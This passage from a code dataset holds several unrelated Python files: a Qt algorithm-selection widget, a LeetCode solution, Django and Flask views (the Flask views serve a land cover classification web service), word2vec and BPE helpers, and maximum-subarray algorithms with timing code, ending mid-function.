Signal(SegmentationResult)\n value_changed = Signal()\n progress_signal = Signal(str, int)\n algorithm_changed = Signal(str)\n\n def __init__(\n self, settings: BaseSettings, algorithms: typing.Dict[str, typing.Type[SegmentationAlgorithm]], parent=None\n ):\n super().__init__(parent)\n self.settings = settings\n self.algorithms = algorithms\n settings.algorithm_changed.connect(self.updated_algorithm)\n self.stack_layout = QStackedLayout()\n self.algorithm_choose = QComboBox()\n self.algorithm_dict: typing.Dict[str, BaseAlgorithmSettingsWidget] = {}\n self.algorithm_choose.currentTextChanged.connect(self.change_algorithm)\n self.add_widgets_to_algorithm()\n\n self.settings.image_changed.connect(self.image_changed)\n # self.setMinimumWidth(370)\n\n self.setContentsMargins(0, 0, 0, 0)\n layout = QVBoxLayout()\n layout.setContentsMargins(0, 0, 0, 0)\n layout.addWidget(self.algorithm_choose)\n layout.addLayout(self.stack_layout)\n self.setLayout(layout)\n\n def add_widgets_to_algorithm(self):\n self.algorithm_choose.blockSignals(True)\n self.algorithm_choose.clear()\n for name, val in self.algorithms.items():\n self.algorithm_choose.addItem(name)\n widget = InteractiveAlgorithmSettingsWidget(self.settings, name, val, [])\n self.algorithm_dict[name] = widget\n widget.algorithm_thread.execution_done.connect(self.result.emit)\n widget.algorithm_thread.finished.connect(self.finished.emit)\n widget.algorithm_thread.started.connect(self.started.emit)\n widget.algorithm_thread.progress_signal.connect(self.progress_signal.emit)\n widget.values_changed.connect(self.value_changed.emit)\n self.stack_layout.addWidget(widget)\n name = self.settings.get(\"current_algorithm\", \"\")\n self.algorithm_choose.blockSignals(False)\n if name:\n 
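# restore the algorithm selected in a previous session, if any\n            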
self.algorithm_choose.setCurrentText(name)\n\n def reload(self, algorithms=None):\n if algorithms is not None:\n self.algorithms = algorithms\n for _ in range(self.stack_layout.count()):\n widget: InteractiveAlgorithmSettingsWidget = self.stack_layout.takeAt(0).widget()\n widget.algorithm_thread.execution_done.disconnect()\n widget.algorithm_thread.finished.disconnect()\n widget.algorithm_thread.started.disconnect()\n widget.algorithm_thread.progress_signal.disconnect()\n widget.values_changed.disconnect()\n self.algorithm_dict = {}\n self.add_widgets_to_algorithm()\n\n def updated_algorithm(self):\n self.change_algorithm(\n self.settings.last_executed_algorithm,\n self.settings.get(f\"algorithms.{self.settings.last_executed_algorithm}\"),\n )\n\n def recursive_get_values(self):\n result = {}\n for key, widget in self.algorithm_dict.items():\n result[key] = widget.recursive_get_values()\n self.settings.set(\"algorithm_widget_state\", update(self.settings.get(\"algorithm_widget_state\", dict), result))\n return result\n\n def change_algorithm(self, name, values: dict = None):\n self.settings.set(\"current_algorithm\", name)\n widget = self.stack_layout.currentWidget()\n self.blockSignals(True)\n if name != widget.name:\n widget = self.algorithm_dict[name]\n self.stack_layout.setCurrentWidget(widget)\n widget.image_changed(self.settings.image)\n if hasattr(widget, \"set_mask\") and hasattr(self.settings, \"mask\"):\n widget.set_mask(self.settings.mask)\n elif values is None:\n self.blockSignals(False)\n return\n if values is not None:\n widget.set_values(values)\n self.algorithm_choose.setCurrentText(name)\n self.blockSignals(False)\n self.algorithm_changed.emit(name)\n\n def image_changed(self):\n current_widget: InteractiveAlgorithmSettingsWidget = self.stack_layout.currentWidget()\n if hasattr(self.settings, \"mask\") and hasattr(current_widget, \"change_mask\"):\n current_widget.change_mask()\n current_widget.image_changed(self.settings.image)\n\n def mask_changed(self):\n current_widget: InteractiveAlgorithmSettingsWidget = self.stack_layout.currentWidget()\n if hasattr(self.settings, \"mask\") and hasattr(current_widget, \"change_mask\"):\n current_widget.change_mask()\n\n def current_widget(self) -> InteractiveAlgorithmSettingsWidget:\n return self.stack_layout.currentWidget()\n\n def current_parameters(self) -> SegmentationProfile:\n widget = self.current_widget()\n return SegmentationProfile(\"\", widget.name, widget.get_values())\n\n def get_info_text(self):\n return self.current_widget().algorithm_thread.get_info_text()\n\n\n# AbstractAlgorithmSettingsWidget.register(AlgorithmSettingsWidget)\n","sub_path":"package/PartSeg/common_gui/algorithms_description.py","file_name":"algorithms_description.py","file_ext":"py","file_size_in_byte":25875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"572472039","text":"from functools import cmp_to_key\n\nclass Solution:\n def isAlienSorted(self, words, order):\n \"\"\"\n :type words: List[str]\n :type order: str\n :rtype: bool\n \"\"\"\n letter_weights = {letter: index for index, letter in enumerate(order)}\n for index in range(len(words) - 1):\n first_word = words[index]\n second_word = words[index + 1]\n if self.compare_words(first_word, second_word, letter_weights) > 0: return False\n return True\n \n def compare_words(self, first, second, letter_weights):\n first_len = len(first)\n second_len = len(second)\n index = 0\n while index < first_len or index < second_len:\n if index >= 
first_len: return -1\n elif index >= second_len: return 1\n first_letter = first[index]\n second_letter = second[index]\n if letter_weights[first_letter] < letter_weights[second_letter]: return -1\n elif letter_weights[first_letter] > letter_weights[second_letter]: return 1\n index += 1\n return 0","sub_path":"leetcode/953.verifying-an-alien-dictionary/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"98176595","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render\n\nfrom models import Organization, Agent\n\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom neoutils import create_activate_deactivate_object\n\nfrom data.handlers import CheckHandler\n\n@api_view(['POST'])\ndef create_activate_deactivate_organization(request):\n action = request.data['action']\n name = request.data['name']\n data = {'name': name}\n\n return Response(create_activate_deactivate_object(Organization, action, **data))\n\n@api_view(['POST'])\ndef create_activate_deactivate_agent(request):\n action = request.data['action']\n first_name = request.data['first_name']\n last_name = request.data['last_name']\n data = {'first_name': first_name, 'last_name': last_name}\n\n return Response(create_activate_deactivate_object(Agent, action, **data))\n\n@login_required\ndef dashboard(request):\n context = {}\n offences = CheckHandler.fetch_offences()\n return render(request, 'data/offences.html', {\n 'offences': offences, 'fines': CheckHandler.get_fines(),\n 'payments': CheckHandler.get_payments()})\n\n@login_required\ndef checks(request):\n return render(request, 'data/successful_checks.html', {\n 'checks': CheckHandler.fetch_checks()\n })","sub_path":"data/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"180839168","text":"from django.shortcuts import render, reverse, redirect\nfrom border.forms import *\nfrom border.models import *\nfrom django.http import HttpResponseRedirect\n\n\nmealRate = {'Breakfast': 8,\n 'Lunch': 30,\n 'Dinner': 27,\n 'Breakfast+Lunch': 38,\n 'Breakfast+Dinner': 35,\n 'Lunch+Dinner': 57,\n 'Breakfast+Lunch+Dinner': 65}\n\n# Create your views here.\n\n\ndef index(request):\n return render(request, 'border/index.html')\n\n\ndef newBorder(request):\n form = BorderInfoForm()\n info = BorderInfo.objects.all().order_by('bazar')\n\n if request.method == 'POST':\n form = BorderInfoForm(data=request.POST)\n if form.is_valid():\n name = request.POST['name']\n room = request.POST['room']\n mobile = request.POST['mobile']\n email = request.POST['email']\n if request.POST['bazar']:\n bazar = request.POST['bazar']\n else:\n bazar = None\n\n BorderInfo.objects.create(name=name, room=room, mobile=mobile,\n email=email, bazar=bazar)\n return HttpResponseRedirect(reverse('index'))\n\n return render(request, 'border/newBorder.html', {'form': form, 'info': info})\n\n\ndef borderList(request):\n data = BorderInfo.objects.all()\n context = {'form': data}\n return render(request, 'border/borderList.html', context=context)\n\n\ndef borderDetail(request, pk):\n profile = BorderInfo.objects.get(id=pk)\n mealinfo = MealInfo.objects.get_or_create(name=profile)[0]\n deposite = 
DepositeInfo.objects.filter(name=profile)\n\n    if request.method == 'POST':\n        try:\n            if request.POST['meal']:\n                meal = request.POST['meal']\n                rate = mealRate[meal]\n                mealinfo.meal = meal\n                mealinfo.rate = rate\n        except KeyError:\n            pass\n\n        # assign directly so 'alter' is bound even when the checkbox value is not 'on'\n        try:\n            alter = request.POST['alterMeal'] == 'on'\n        except KeyError:\n            alter = False\n\n\n        # try:\n        #     if request.POST['deposite']:\n        #         amount = request.POST['deposite']\n        #         print(amount)\n        #         DepositeInfo(name=profile, amount=amount, date=datetime.now())\n        # except KeyError:\n        #     pass\n\n        mealinfo.alter = alter\n        mealinfo.save()\n\n        mealinfo = MealInfo.objects.filter(name=profile)\n        return HttpResponseRedirect(request.path_info)\n\n    context = {'profile': profile, 'deposite': deposite, 'mealinfo': mealinfo}\n    return render(request, 'border/borderDetail.html', context=context)\n","sub_path":"mealManager/border/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"109303819","text":"import gensim\nimport constants\n\n\ndef load_w2v_model(file_name: str):\n    global w2v_model\n    print(\"starting to load a w2v model\")\n    w2v_model = gensim.models.KeyedVectors.load_word2vec_format(file_name)\n    print(\"w2v model '%s' loaded\" % file_name)\n    return w2v_model\n\n\n# Get the word vectors for a list of words\ndef get_vectors(words: list) -> list:\n    global w2v_model\n    try:\n        return [w2v_model[word] for word in words]\n    except MemoryError:\n        return []\n\n\n# Get the similarity between two words\ndef get_similarity(word1: str, word2: str) -> list:\n    global w2v_model\n    try:\n        return w2v_model.similarity(word1, word2)\n    except MemoryError:\n        return []\n\n\n# Get the top-n associations\ndef get_associations(words: list, tn=10) -> list:\n    global w2v_model\n    assoc_lst = []\n    try:\n        assoc_lst = w2v_model.most_similar(positive=words, topn=tn)\n    except MemoryError:\n        pass\n    finally:\n        if assoc_lst == []:\n            raise KeyError\n        return assoc_lst\n\n\nw2v_model = load_w2v_model(constants.w2w_model_file)\n","sub_path":"semantics.py","file_name":"semantics.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"46762705","text":"import time\nimport random\nfrom math import floor\n'''\nReads data from input file\nReturns list of list of ints\nParameters:\nfilename - string name of file to open\n'''\ndef getInputData(filename):\n    data = []\n    with open(filename) as inFile:\n        for line in inFile:\n            line = line.split()\n            line = [int(i) for i in line]\n            data.append(line)\n    return data\n\n'''\nwrites data to file in specified format\nParameters:\noutFile - file object in write mode\nA - full array\nstartPos - starting position of subArray\nendPos - end position of subArray\ntotal - sum of maximum subArray\n'''\ndef writeData(outFile, A, startPos, endPos, total):\n    outFile.write(' '.join(str(x) for x in A) + '\\n')\n    outFile.write(' '.join(str(A[x]) for x in range(startPos, endPos+1)) + '\\n')\n    outFile.write(str(total) + '\\n\\n')\n\n'''\nenumerative version of Max_Subarray\ncomputes A[i] + A[i+1] + ... 
+ A[j-1] + A[j] each time\nParameters:\nA - an array of ints\nReturns - array consisting of original array, startPosition of subarray, endPosition of subArray, and maximum subarray sum\n'''\ndef Enum_Max_Subarray(A):\n    maximum = A[0]\n    subArrayStart = 0\n    subArrayEnd = 0\n    currentTotal = 0\n    for i in range(len(A)):\n        for j in range(i+1, len(A)):\n            currentTotal = 0\n            for k in range(i, j+1):\n                currentTotal += A[k]\n            if currentTotal > maximum:\n                maximum = currentTotal\n                subArrayStart = i\n                subArrayEnd = j\n    return [A, subArrayStart, subArrayEnd, maximum]\n\n'''\nBetter enumerative version of Max_Subarray\nstores prior computations of A[i] + A[i+1] + ... + A[j-1]\nParameters:\nA - an array of ints\nReturns - array consisting of original array, startPosition of subarray, endPosition of subArray, and maximum subarray sum\n'''\ndef Better_Enum_Max_Subarray(A):\n    maximum = A[0]\n    subArrayStart = 0\n    subArrayEnd = 0\n    currentTotal = 0\n    for i in range(len(A)):\n        currentTotal = A[i]\n        for j in range(i+1, len(A)):\n            currentTotal += A[j]\n            if currentTotal > maximum:\n                maximum = currentTotal\n                subArrayStart = i\n                subArrayEnd = j\n    return [A, subArrayStart, subArrayEnd, maximum]\n\ndef DCHelper(A):\n    return Divide_and_Conquer(A, 0, len(A) - 1)\n\ndef Divide_and_Conquer(A, low, high):\n    if high == low:\n        return [A, low, high, A[low]]\n    else:\n        # integer division keeps mid an int so it stays usable as an index in Python 3\n        mid = (low + high) // 2\n        (A, leftLow, leftHigh, leftSum) = Divide_and_Conquer(A, low, mid)\n        (A, rightLow, rightHigh, rightSum) = Divide_and_Conquer(A, mid + 1, high)\n        (A, crossLow, crossHigh, crossSum) = maxCrossing(A, low, mid, high)\n\n        if (leftSum >= rightSum and leftSum >= crossSum):\n            return [A, leftLow, leftHigh, leftSum]\n        elif (rightSum >= leftSum and rightSum >= crossSum):\n            return [A, rightLow, rightHigh, rightSum]\n\n        return [A, crossLow, crossHigh, crossSum]\n\ndef maxCrossing(A, low, mid, high):\n    leftSum = float(\"-inf\")\n    sum = 0\n    maxRight = 0\n    maxLeft = 0\n    for i in range(mid, low - 1, -1):\n        sum = sum + A[i]\n        if sum > leftSum:\n            leftSum = sum\n            maxLeft = i\n    rightSum = float(\"-inf\")\n    sum = 0\n    for j in range(mid + 1, high + 1):\n        sum = sum + A[j]\n        if sum > rightSum:\n            rightSum = sum\n            maxRight = j\n\n    return (A, maxLeft, maxRight, leftSum + rightSum)\n\n'''\nLinear algorithm to solve the max subarray problem.\nParameters:\nA - Array to search for maximum subarray from.\nReturns:\nMaximum subarray sum, start and end positions of maximum subarray.\n'''\ndef Linear_Max_Subarray(A):\n    maxSum = maxSoFar = A[0]\n    subArrayStart = subArrayEnd = 0\n    for i in range(1, len(A)):\n        maxSoFar = max(A[i], maxSoFar + A[i])\n        if maxSoFar == A[i]:\n            subArrayStart = i\n        maxSum = max(maxSum, maxSoFar)\n        if maxSum == maxSoFar:\n            subArrayEnd = i\n    return [A, subArrayStart, subArrayEnd, maxSum]\n\n\n'''\nget time data from function with various input sizes\nparameters:\nfunctionToCall: function of algorithm you want to test\ninputSizes: list of input sizes\nReturns - A list of time data for each inputSize\n'''\ndef timeFunction(functionToCall, inputSizes):\n    timeList = []\n    #go through all input Sizes\n    for i in inputSizes:\n        currLists = []\n        #need to make 10 arrays of each inputSize\n        for j in range(10):\n            a = []\n            #append i random integers to a list\n            for k in range(i):\n                a.append(random.randint(-1000,1000))\n            currLists.append(a)\n\n        #currLists now holds 10 arrays of size i\n        #call and time the function with 10 different arrays for each inputSize\n        times = []\n        for j in range(10):\n            startTime = time.time()\n            
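# run the algorithm once on this array and record the elapsed wall-clock time\n            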
functionToCall(currLists[j])\n times.append(time.time() - startTime)\n avgTime = sum(times) / 10.0\n timeList.append(avgTime) #timeList holds the averages for all\n return timeList\n\n'''\nprint time data\nParameters:\nfunction - name of function you want to call\ninputSizes - list of inputSizes to test\n'''\ndef getExperimentalData(function, inputSizes):\n timeList = timeFunction(function, inputSizes)\n print(str(function))\n for x in range(len(timeList)):\n print('n = ' + str(inputSizes[x]) + ': ' + str(timeList[x]))\n\n'''\ncreates output file\nparameters:\n\ninFilename - string of filename for input\noutFilename - string of filename for output\n'''\ndef createOutputFile(inFilename, outFilename):\n outFile = open(outFilename, 'w') #open outFile here so it overwrites existing file only once\n data = getInputData(inFilename)\n params = []\n functionsList = [Enum_Max_Subarray, Better_Enum_Max_Subarray, DCHelper,Linear_Max_Subarray] \n functionNames = [\"Enumerative\", \"Better Enumerative\", \"Divide and Conquer\", \"Linear\"]\n for i in range(len(functionsList)):\n outFile.write(\"-------------\" + functionNames[i] + \"-------------\\n\\n\")\n for j in range(len(data)):\n params = functionsList[i](data[j])\n #parameters for each function should be (outfile, originalArray, startPos, endPos, maximum)\n writeData(outFile, params[0], params[1], params[2], params[3])\n outFile.close()\n\n\n\n#-----Similar calls should work for your function as long as the function takes in a single list of integers, and returns a list in the form:\n#[Full array, Start of subarray, end of subarray, sum of subarray]\n \n\nenumInputSizes = [500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400]\nbetterEnumInputSizes = [7000, 9000, 11000, 13000, 15000, 17000, 19000, 21000, 23000, 25000]\ndncInputSizes = [200000, 225000, 250000, 275000, 300000, 325000, 350000, 375000, 400000, 425000]\nlinearInputSizes = [1000000, 2000000, 3000000, 4000000, 5000000, 6000000, 7000000, 8000000, 9000000, 10000000]\n\n#Gets experimental data for various n value\ngetExperimentalData(Enum_Max_Subarray, enumInputSizes)\ngetExperimentalData(Better_Enum_Max_Subarray, betterEnumInputSizes)\ngetExperimentalData(DCHelper, dncInputSizes)\ngetExperimentalData(Linear_Max_Subarray, linearInputSizes)\n\n\n''' THE LINE BELOW SHOULD BE THE ONLY LINE WE NEED FOR OUR SUBMISSION -- IT SHOULD HAVE\nMSS_Problems.txt as inputFile and MSS_Results.txt as outputFile'''\n\n#takes in input file and writes results in specified file -- see note above about functions to pass in\n\ncreateOutputFile('MSS_Problems.txt', 'MSS_Results.txt')\n\n\n","sub_path":"project1.py","file_name":"project1.py","file_ext":"py","file_size_in_byte":7676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"273315327","text":"import torch\nfrom utils import load_data, dataset2sentences, dataset2vocab, initialise_bpe, bpe_apply, map_encoded_sentences_to_dataset\n\nTRAIN_FILE_PATH = \"./data/train_bio.txt\"\nTEST_FILE_PATH = \"./data/test_bio.txt\"\nVALID_FILE_PATH = \"./data/valid_bio.txt\"\n\ninitialise_bpe()\n\n\nfor (path, name) in zip([TRAIN_FILE_PATH, TEST_FILE_PATH, VALID_FILE_PATH], ['train', 'test', 'valid']):\n data = load_data(path)\n\n sentences = dataset2sentences(data)\n encoded_sentences = bpe_apply(sentences)\n m = mapped_encoded_sentences = map_encoded_sentences_to_dataset(data, encoded_sentences)\n with open(\"data/{}_bio_bpe.txt\".format(name), \"w\") as f:\n for s in m:\n for word in s:\n f.write(str(\" \".join(word) + 
\"\\n\"))\n\n f.write(\"\\n\")\n\n","sub_path":"src/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"291282380","text":"#\n# This file is part of Land Cover Classification System Web Service.\n# Copyright (C) 2020-2021 INPE.\n#\n# Land Cover Classification System Web Service is free software; you can redistribute it and/or modify it\n# under the terms of the MIT License; see LICENSE file for more details.\n#\n\"\"\"Views of Land Cover Classification System Web Service.\"\"\"\nfrom io import BytesIO\n\nfrom bdc_auth_client.decorators import oauth2\nfrom flask import abort, current_app, jsonify, request, send_file\nfrom lccs_db.utils import get_extension\n\nfrom lccs_ws.forms import (ClassesMappingMetadataSchema, ClassesMappingSchema,\n ClassesSchema, ClassificationSystemMetadataSchema,\n ClassificationSystemSchema, ClassMetadataSchema,\n StyleFormatsMetadataSchema, StyleFormatsSchema)\n\nfrom . import data\nfrom .config import Config\n\nBASE_URL = Config.LCCS_URL\n\n\n@current_app.route(\"/\", methods=[\"GET\"])\ndef root():\n \"\"\"URL Handler for Land User Cover Classification System through REST API.\"\"\"\n links = list()\n response = dict()\n \n links += [\n {\"href\": f\"{BASE_URL}/\", \"rel\": \"self\", \"type\": \"application/json\", \"title\": \"Link to this document\"},\n {\"href\": f\"{BASE_URL}/classification_systems\", \"rel\": \"classification_systems\", \"type\": \"application/json\",\n \"title\": \"List classification_systems\", }\n ]\n \n response[\"links\"] = links\n response[\"lccs_version\"] = Config.BDC_LCCS_API_VERSION\n \n return response\n\n\n@current_app.route(\"/classification_systems\", methods=[\"GET\"])\ndef get_classification_systems():\n \"\"\"Retrieve the list of available classification systems in the service.\"\"\"\n classification_systems_list = data.get_classification_systems()\n \n for class_system in classification_systems_list:\n links = [\n {\n \"href\": f\"{BASE_URL}/classification_systems/{class_system['id']}\",\n \"rel\": \"classification_system\",\n \"type\": \"application/json\",\n \"title\": \"Link to Classification System\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems/{class_system['id']}/classes\",\n \"rel\": \"classes\",\n \"type\": \"application/json\",\n \"title\": \"Link to Classification System Classes\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems/{class_system['id']}/style_formats\",\n \"rel\": \"style_formats\",\n \"type\": \"application/json\",\n \"title\": \"Link to Available Style Formats\",\n },\n {\n \"href\": f\"{BASE_URL}/mappings/{class_system['id']}\",\n \"rel\": \"mappings\",\n \"type\": \"application/json\",\n \"title\": \"Link to Classification Mappings\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems\",\n \"rel\": \"self\",\n \"type\": \"application/json\",\n \"title\": \"Link to this document\",\n },\n ]\n \n class_system[\"links\"] = links\n \n return jsonify(classification_systems_list)\n\n\n@current_app.route(\"/classification_systems/\", methods=[\"GET\"])\ndef classification_systems(system_id):\n \"\"\"Retrieve information about the classification system.\n\n :param system_id: identifier of a classification system\n \"\"\"\n classification_system = data.get_classification_system(system_id)\n \n if not classification_system:\n abort(404, \"Classification System not found.\")\n \n links = [\n {\n \"href\": 
f\"{BASE_URL}/classification_systems\",\n \"rel\": \"parent\",\n \"type\": \"application/json\",\n \"title\": \"Link to this document\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}\",\n \"rel\": \"self\",\n \"type\": \"application/json\",\n \"title\": \"The classification_system\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}/classes\",\n \"rel\": \"classes\",\n \"type\": \"application/json\",\n \"title\": \"The classes related to this item\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}/style_formats\",\n \"rel\": \"styles_formats\",\n \"type\": \"application/json\",\n \"title\": \"The styles formats related to this item\",\n },\n {\n \"href\": f\"{BASE_URL}/mappings/{system_id}\",\n \"rel\": \"mappings\",\n \"type\": \"application/json\",\n \"title\": \"The classification system mappings\",\n },\n {\"href\": f\"{BASE_URL}/\", \"rel\": \"root\", \"type\": \"application/json\", \"title\": \"API landing page.\"},\n ]\n \n classification_system[\"links\"] = links\n \n return classification_system\n\n\n@current_app.route(\"/classification_systems//classes\", methods=[\"GET\"])\ndef classification_systems_classes(system_id):\n \"\"\"Retrieve the classes of a classification system.\n \n :param system_id: identifier of a classification system\n \"\"\"\n classes_list = data.get_classification_system_classes(system_id)\n\n links = list()\n \n links += [\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}/classes\",\n \"rel\": \"self\",\n \"type\": \"application/json\",\n \"title\": f\"Classes of the classification system {system_id}\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}\",\n \"rel\": \"parent\",\n \"type\": \"application/json\",\n \"title\": \"Link to classification system\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems\",\n \"rel\": \"parent\",\n \"type\": \"application/json\",\n \"title\": \"Link to classification systems\",\n },\n {\n \"href\": f\"{BASE_URL}/\",\n \"rel\": \"root\",\n \"type\": \"application/json\",\n \"title\": \"API landing page\",\n },\n ]\n\n if not len(classes_list) > 0:\n return jsonify(links)\n \n for system_classes in classes_list:\n links.append(\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}/classes/{system_classes['id']}\",\n \"rel\": \"child\",\n \"type\": \"application/json\",\n \"title\": \"Classification System Classes\",\n }\n )\n return jsonify(links)\n\n\n@current_app.route(\"/classification_systems//classes/\", methods=[\"GET\"])\ndef classification_systems_class(system_id, class_id):\n \"\"\"Retrieve class information from a classification system.\n\n :param system_id: identifier of a classification system\n :param class_id: identifier of a class\n \"\"\"\n classes = data.get_classification_system_class(system_id, class_id)\n \n if not len(classes) > 0:\n abort(404, f\"Class not found.\")\n \n links = [\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}/classes/{classes['id']}\",\n \"rel\": \"self\",\n \"type\": \"application/json\",\n \"title\": \"Link to this document\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}/classes\",\n \"rel\": \"parent\",\n \"type\": \"application/json\",\n \"title\": \"Link to this document\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems\",\n \"rel\": \"parent\",\n \"type\": \"application/json\",\n \"title\": \"Link to classification systems\",\n },\n {\n \"href\": f\"{BASE_URL}/\",\n \"rel\": \"root\",\n \"type\": 
\"application/json\",\n \"title\": \"API landing page\",\n },\n \n ]\n \n classes[\"links\"] = links\n \n return classes\n\n\n@current_app.route(\"/mappings/\", methods=[\"GET\"])\ndef get_mappings(system_id):\n \"\"\"Retrieve available mappings for a classification system.\n\n :param system_id: identifier of a classification system\n \"\"\"\n mappings = data.get_mappings(system_id)\n \n if not len(mappings) > 0:\n abort(404, f\"Mappings not found.\")\n \n links = list()\n \n links += [\n {\n \"href\": f\"{BASE_URL}/classification_systems\",\n \"rel\": \"parent\",\n \"type\": \"application/json\",\n \"title\": \"Link to classification systems\",\n },\n {\n \"href\": f\"{BASE_URL}/\",\n \"rel\": \"root\",\n \"type\": \"application/json\",\n \"title\": \"API landing page\",\n },\n ]\n \n for mapping_system in mappings:\n links.append({\n \"href\": f\"{BASE_URL}/mappings/{system_id}/{mapping_system}\",\n \"rel\": \"child\",\n \"type\": \"application/json\",\n \"title\": \"Mapping\",\n })\n \n return jsonify(links)\n\n\n@current_app.route(\"/mappings//\", methods=[\"GET\"])\ndef get_mapping(system_id_source, system_id_target):\n \"\"\"Retrieve mapping.\n\n :param system_id_source: identifier of source classification system\n :param system_id_target: identifier of target classification system\n \"\"\"\n class_system_mappings = data.get_mapping(system_id_source, system_id_target)\n \n for mp in class_system_mappings:\n links = [\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id_source}/classes/{mp['source_class_id']}\",\n \"rel\": \"item\",\n \"type\": \"application/json\",\n \"title\": \"Link to source class\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id_target}/classes/{mp['target_class_id']}\",\n \"rel\": \"item\",\n \"type\": \"application/json\",\n \"title\": \"Link to target class\",\n },\n ]\n mp[\"degree_of_similarity\"] = float(mp[\"degree_of_similarity\"])\n mp[\"links\"] = links\n \n return jsonify(class_system_mappings)\n\n\n@current_app.route(\"/style_formats\", methods=[\"GET\"])\ndef get_styles_formats():\n \"\"\"Retrieve available style formats in service.\"\"\"\n styles_formats = data.get_style_formats()\n \n links = [\n {\n \"href\": f\"{BASE_URL}/classification_systems\",\n \"rel\": \"parent\",\n \"type\": \"application/json\",\n \"title\": \"Link to classification systems\",\n },\n {\n \"href\": f\"{BASE_URL}/\",\n \"rel\": \"root\",\n \"type\": \"application/json\",\n \"title\": \"API landing page\",\n },\n ]\n \n for st_f in styles_formats:\n links.append({\n \"href\": f\"{BASE_URL}/style_formats/{st_f['id']}\",\n \"rel\": \"items\",\n \"type\": \"application/json\",\n \"title\": f\"Link to style format {st_f['id']}\"\n })\n \n return jsonify(links)\n\n\n@current_app.route(\"/style_formats/\", methods=[\"GET\"])\ndef get_style_format(style_format_id):\n \"\"\"Retrieve information of a style formats.\n\n :param style_format_id: identifier of a style format\n \"\"\"\n styles_format = data.get_style_format(style_format_id=style_format_id)\n \n if not len(styles_format) > 0:\n abort(404, f\"Style Format not found.\")\n \n links = [\n {\n \"href\": f\"{BASE_URL}/classification_systems\",\n \"rel\": \"classification_systems\",\n \"type\": \"application/json\",\n \"title\": \"Link to classification systems\",\n },\n {\n \"href\": f\"{BASE_URL}/\",\n \"rel\": \"root\",\n \"type\": \"application/json\",\n \"title\": \"API landing page\",\n },\n {\n \"href\": f\"{BASE_URL}/style_formats/{styles_format['id']}\",\n \"rel\": \"style_format\",\n 
\"type\": \"application/json\",\n \"title\": \"Link to classification systems\",\n },\n {\n \"href\": f\"{BASE_URL}/style_formats/\",\n \"rel\": \"parent\",\n \"type\": \"application/json\",\n \"title\": \"Link to classification systems\",\n },\n ]\n \n styles_format[\"links\"] = links\n \n return styles_format\n\n\n@current_app.route(\"/classification_systems//style_formats\", methods=[\"GET\"])\ndef get_style_formats_classification_system(system_id):\n \"\"\"Retrieve available style formats for a classification system.\n\n :param system_id: identifier of a source classification system\n \"\"\"\n style_formats_id = data.get_system_style_format(system_id=system_id)\n \n if not len(style_formats_id) > 0:\n abort(404, f\"Style Formats not found.\")\n \n links = list()\n \n links += [\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}/style_formats\",\n \"rel\": \"self\",\n \"type\": \"application/json\",\n \"title\": f\"Available style formats for {system_id}\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}\",\n \"rel\": \"parent\",\n \"type\": \"application/json\",\n \"title\": \"Link to classification system\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems\",\n \"rel\": \"parent\",\n \"type\": \"application/json\",\n \"title\": \"Link to classification systems\",\n },\n {\n \"href\": f\"{BASE_URL}/\",\n \"rel\": \"root\",\n \"type\": \"application/json\",\n \"title\": \"API landing page\",\n },\n ]\n \n for style_id in style_formats_id:\n links.append(\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}/styles/{style_id[0]}\",\n \"rel\": \"style\",\n \"type\": \"application/json\",\n \"title\": \"Link to style\",\n }\n )\n \n return jsonify(links)\n\n\n@current_app.route(\"/classification_systems//styles/\", methods=[\"GET\"])\ndef style_file(system_id, style_format_id):\n \"\"\"Retrieve available styles.\n\n :param system_id: identifier of a classification system\n :param style_format_id: identifier of a style format\n \"\"\"\n system_style_file = data.get_classification_system_style(system_id, style_format_id)\n \n if not system_style_file:\n abort(404, f\"Style File not found.\")\n \n extension = get_extension(system_style_file.mime_type)\n \n system = data.classification_system(system_id)\n style_format = data.get_style_format(style_format_id)\n \n file_name = f\"{system.name}_version-{system.version}_{style_format['name']}\" + extension\n \n return send_file(BytesIO(system_style_file.style), mimetype='application/octet-stream', as_attachment=True,\n attachment_filename=file_name)\n\n\n@current_app.route(\"/classification_systems/search//\", methods=[\"GET\"])\ndef classification_system_search(system_name, system_version):\n \"\"\"Return identifier of a classification system.\n \n :param system_name: name of a classification system\n :param system_version: version of a classification system\n 